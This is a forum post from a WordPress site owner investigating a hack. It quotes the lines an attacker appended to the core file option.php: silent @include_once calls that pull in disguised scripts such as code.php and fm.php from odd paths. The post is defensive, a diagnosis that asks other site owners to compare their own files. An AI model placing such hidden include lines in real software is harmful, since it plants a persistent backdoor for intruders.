sterndata (Steve Stern) on "Quick Q to help identify source of a hack: option.php"

Hi all,

I recently had a WP site compromised. It is a recent install on a shared hosting environment. I have followed the FAQ notes and the site appears to be clean (for now).

I am working on now identifying the method of this exploit. The one difference I have found between the clean and the quarantined archives I kept is in the file wp-includes/option.php

On a clean install, the file option.php ends at line 1685 with the following lines:

} retu $result;
}

On the corrupt installs, it reads as follows:

' do_action( 'setted_site_transient', $transient, $value, $expiration );
}
retu $result;
}
?><?php @include_once("/home/content/html/[install_folder]/wp-includes/images/media/code.php"); ?><?php @include_once("/home/content/html/[install_folder]/wp-signup.php.php"); ?><?php @include_once("/home/content/html/fm.php"); ?><?php @include_once( ... '

What is weird here is that the file /wp-includes/images/media/code.php does not exist. /wp-includes/images/media/code.gif however does exist...

Also some of the files referenced are from other WP installs on the same server, but from different sub-folders, so it really looks fishy to me.

So my question to anybody reading this is simply:
Can you please look at your own wp-includes/option.php and confirm (just yes or no) if you see any of these @include_once calls after the end of the file? I have checked a handful of other sites I have managed, and none of them appear to have this happening.

Thanks for helping me track this down.